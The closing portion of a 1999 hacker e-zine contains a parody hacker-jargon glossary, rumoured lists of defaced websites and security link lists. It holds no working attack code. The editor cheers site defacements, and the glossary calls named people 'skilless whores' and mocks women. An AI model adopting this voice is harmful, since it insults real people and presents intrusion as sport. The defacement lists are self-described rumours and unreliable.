- despicable hackers will no longer disrupt websites to make fun of our institutions, or pollute the Information
- Superhighway with filthy swear words," said former Vice President Al Gore, founder of the Internet, before he
- suddenly toppled over and dumped core. "NTLDR not found. INVALID_BOOT_DEVICE in kernel32.exe
- 006383dhX00029393."
- Posted on Fri 26 Mar 00:21:38 1999 GMT
- Written by Potato <meersan@linuxmail.org>
-
-
-
-
-
- -----------------------------/-----------------------------
-
-
- You have to learn the lingo to become 31337
-
- AOL - The best isp in the world. All of the real hax0rs use it.
-
- bot - ereet program to 0wn you irc channel for you while you are gone, Curt is the god of bots
-
- chix0rs - girlies that hax0rs will never get because they ph33r them too much.
-
- ftp - k-rad hax0ring utility used to get passwd files and warez.(if the passwd file is shadow, make sure you get on irc and ask
- everyone how to unshadow it.)
-
- hax0r - Someone that punts, nukes, mailbombs, and 0wns everyone else and tells them that repeatedly.
-
- IRC - The place where lamers go to chat. The lamest channels are #2600, #hack, #phreak, #hackphreak, etc. The only k-cool
- channels are #bastards on effnet, #warez, and #gaycartoonsex.
-
- lame - stupid, not leet, suck ass, "emmanuel goldstein is lame"
-
- leet - (elite, eleet, 1337, 31337 etc.)good, cool , k-rad, "Cochise is leet"
-
- Linux - The OS that lamers that think they are hax0rs use.
-
- Microsoft Unix 98 - The super k-rad OS that every real hax0r uses.
-
- progs - Tools that every hax0r must have for punting, mailbombing, scrolling, etc.
-
- pr0n - pictures of nekkid chix0rs. (note: this is as close to a chix0r a hax0r will ever get.)
-
- skilless whore - a stupid bitchx0r that thinks she knows everything, but doesnt know anything. "Orin and Annie are skilless
- whores"
-
- Warez - K-rad pirated software that every hax0r must trade.
-
-
- http://neatoelito.org/hax0ring/jargon.html
-
- - submitted by A.Silliman
-
- @HWA
-
-
-
- SITE.1
-
-
- @HWA
-
-
-
- H.W Hacked websites
- ~~~~~~~~~~~~~~~~
-
- Note: The hacked site reports stay, especially with some cool hits by
- groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed
-
- * Hackers Against Racist Propaganda (See issue #7)
-
-
- Haven't heard from Catharsys in a while for those following their saga visit
- http://frey.rapidnet.com/~ptah/ for 'the story so far'...
-
-
-
- Looks like things are quieter than normal perhaps with all the FBI action thats
- going down and groups getting raided some people are becoming a little antsy,
- well heres the list for this week according to HNN...
-
-
- From HNN rumours section, http://www.hackernews.com/
-
-
- May 24th
-
- contributed by Anonymous
-
- Cracked
- It has been a busy weekend for some people. These are
- the sites that have been reported to HNN as cracked.
- Please remember that this is the rumours section. While
- most of these are verified we can't verify them all.
-
- http://www.elitehackers1.net
- http://www.ruckstuhlgaragen.ch
- http://www.gibson.com
- http://www.e.gov
- http://www.ebuy.gov
- http://codesign.scu.edu
- http://www.castnetcom.com
- http://plan.arch.usyd.edu.au
- http://www.4women.gov
- http://www.clic.nl
- http://www.etnews.co.kr
- http://www.hackvp.net
- http://eval1.oit.unc.edu
- http://elkriver.k12.mn.us
- http://jutr.gov.my
- http://nc-101.hypermart.net
- http://www.barekids.com
- http://www.holsey.com
- http://www.team-liquid.com
- http://www.metro.seoul.kr
- http://learnweb.harvard.edu
- http://ngpsun.ngpc.state.ne.us
- http://www.buscominc.com
- http://www.columbuslumber.com
- http://www.cpavision.org
- http://www.elitexposure.com
- http://www.superiortours.com
-
- May 27th
-
- From HNN rumours section;
-
- contributed by Anonymous
- Cracked
- These are the sites that have been reported to us as
- cracked.
- http://do-nt.8j.net-2
- http://data.digex.net
- http://nation.com.pk
- http://www.pak.gov.pk
- http://www.the-dark-immortals.org
-
-
-
-
- May 28th
-
- From HNN rumours section;
-
- contributed by Anonymous
- Cracked
- The following websites have been reported as cracked
- http://info2.cs-snd.com.cn
- http://mmic.snu.ac.kr
- http://vunews.vanderbilt.edu
- http://wfserverb.weifang.gov.cn
- http://www.abatelli.com
- http://www.brain3.com
- http://www.bringardner.com
- http://www.century21rustic.com
- http://www.cookpony.com
- http://www.craftsmenhomes.com
- http://www.devlin-mcniff.com
- http://www.dunemere.com
- http://www.firsttowne.com
- http://www.hampton.net
- http://www.hanfra.com
- http://www.lambagency.com
- http://www.mainstproperties.com
- http://www.makah.org
- http://www.montauk.net
- http://www.morleyagency.com
- http://www.moviespotlight.com
- http://www.warez-city.cx
- http://www.bobhowardnissan.com
- http://www.cns.state.va.us
- http://www.senate.gov
-
-
- -------------------------------------------------------------------------
-
- A.0 APPENDICES
- _________________________________________________________________________
-
-
-
- A.1 PHACVW, sekurity, security, cyberwar links
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- The links are no longer maintained in this file, there is now a
- links section on the http://welcome.to/HWA.hax0r.news/ url so check
- there for current links etc.
-
- The hack FAQ (The #hack/alt.2600 faq)
- http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
- <a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>
-
- Hacker's Jargon File (The quote file)
- http://www.lysator.liu.se/hackdict/split2/main_index.html
- <a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>
-
- New Hacker's Jargon File.
- http://www.tuxedo.org/~esr/jargon/
- <a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>
-
-
- HWA.hax0r.news Mirror Sites:
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~
- http://www.csoft.net/~hwa/
- http://www.digitalgeeks.com/hwa.
- http://members.tripod.com/~hwa_2k
- http://welcome.to/HWA.hax0r.news/
- http://www.attrition.org/~modify/texts/zines/HWA/
- http://www.genocide2600.com/~tattooman/zines/hwahaxornews/
- http://archives.projectgamma.com/zines/hwa/.
- http://www.403-security.org/Htmls/hwa.hax0r.news.htm
-
-
- International links:(TBC)
- ~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Foreign correspondants and others please send in news site links that
- have security news from foreign countries for inclusion in this list
- thanks... - Ed
-
-
-
- Belgium.......: http://bewoner.dma.be/cum/
- <a href="http://bewoner.dma.be/cum/">Go there</a>
-
- Brasil........: http://www.psynet.net/ka0z
- <a href="http://www.psynet.net/ka0z/">Go there</a>
-
- http://www.elementais.cjb.net
- <a href="http://www.elementais.cjb.net/">Go there</a>
-
- Columbia......: http://www.cascabel.8m.com
- <a href="http://www.cascabel.8m.com/">Go there</a>
-
- http://www.intrusos.cjb.net
- <a href="http://www.intrusos.cjb.net">Go there</a>
-
- Indonesia.....: http://www.k-elektronik.org/index2.html
- <a href="http://www.k-elektronik.org/index2.html">Go there</a>
-
- http://members.xoom.com/neblonica/
- <a href="http://members.xoom.com/neblonica/">Go there</a>
-
- http://hackerlink.or.id/
- <a href="http://hackerlink.or.id/">Go there</a>
-
- Netherlands...: http://security.pine.nl/
- <a href="http://security.pine.nl/">Go there</a>
-
- Russia........: http://www.tsu.ru/~eugene/
- <a href="http://www.tsu.ru/~eugene/">Go there</a>
-
- Singapore.....: http://www.icepoint.com
- <a href="http://www.icepoint.com">Go there</a>
-
- Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.
- <a href="http://www.trscene.org/">Go there</a>
-
- Got a link for this section? email it to hwa@press.usmc.net and i'll
- review it and post it here if it merits it.
-
- @HWA
-
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-
- ⌐ 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
- [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]
-
-
-